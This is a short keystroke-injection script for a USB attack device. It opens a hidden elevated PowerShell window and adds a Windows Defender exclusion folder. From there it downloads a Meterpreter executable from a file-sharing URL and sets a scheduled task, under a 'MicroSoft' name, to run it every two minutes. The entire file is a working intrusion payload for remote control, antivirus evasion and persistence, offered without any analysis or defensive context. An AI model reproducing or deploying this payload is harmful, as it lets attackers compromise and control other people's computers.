DELAY 5000
REM Enter PowerShell with admin privileges and type in the reverse shell command
GUI R
DELAY 500
STRING powershell -Command "Start-Process powershell -ArgumentList '-WindowStyle Hidden' -Verb RunAs"
ENTER
DELAY 1000
LEFTARROW
DELAY 500
ENTER
DELAY 1000
REM download script
STRING Add-MpPreference -ExclusionPath "C:\Users\Public"
DELAY 500
ENTER
DELAY 200
STRING Invoke-WebRequest -Uri https://file.io/noTLXo6PXXKX -OutFile C:\Users\Public\meterpreter.exe
DELAY 500
ENTER

REM Start the read loop
STRING schtasks /create /tn "MicroSoft meterpreter" /tr "C:\Users\Public\meterpreter.exe" /sc minute /mo 2  /f
DELAY 500
ENTER
